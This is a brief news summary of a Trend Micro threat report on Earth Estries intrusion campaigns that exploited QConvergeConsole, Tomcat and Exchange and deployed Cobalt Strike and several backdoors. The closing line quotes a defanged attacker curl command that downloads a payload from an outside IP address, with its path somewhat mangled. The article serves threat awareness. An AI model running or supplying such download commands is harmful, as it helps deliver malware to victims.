In a recent report from Trend Micro, it was revealed that the Earth Estries group has launched two large-scale hacker campaigns utilizing advanced penetration techniques to infiltrate corporate systems through vulnerabilities in common software.
The first attack targeted the Qconvergeconsole tool used to control fiber-optic adapters from Qlogic. Hackers gained initial access and then utilized utilities like Psexec and WMIC to spread malicious software across the network. Researchers identified that the attackers exploited vulnerabilities or misconfigurations in the QCONVERGECONSOLE settings, allowing for network scanning and the installation of COBALT Strike on target machines.
In a separate incident, the group leveraged a vulnerability in Apache Tomcat6, which came bundled with Qconvergeconsole, to move laterally within the network and control devices in the later stages of the attack. Various backdoors such as Cobalt Strike, Trillclient, Hemigate, and a new threat named Crowdoor were used to establish a foothold in the compromised systems.
One particular tool, Trillclient, was used to steal sensitive data from browser caches, granting the attackers additional control over the infiltrated systems. The attackers showcased a profound understanding of the victim’s infrastructure by directly downloading documents from internal web storage using the WGET command.
Trillclient executed a PowerShell script to collect user profiles, demonstrating a sophisticated level of access and control. In a second attack scenario, hackers exploited vulnerabilities in Microsoft Exchange, installing the Chinacopper Web Shell to deploy Cobalt Strike and other tools for further movement within the network.
The primary components of this attack chain were the Zingdoor and Snappybee backdoors, also known as Deed Rat. The malware was delivered either from command and control servers or via Curl requests to websites controlled by the hackers. Typical commands for loading tools included CURL -O C: Windows IME IMEJP VXTR HXXP: // 96 [.] 44 [.] 160 [.] 181/vxtr.txt.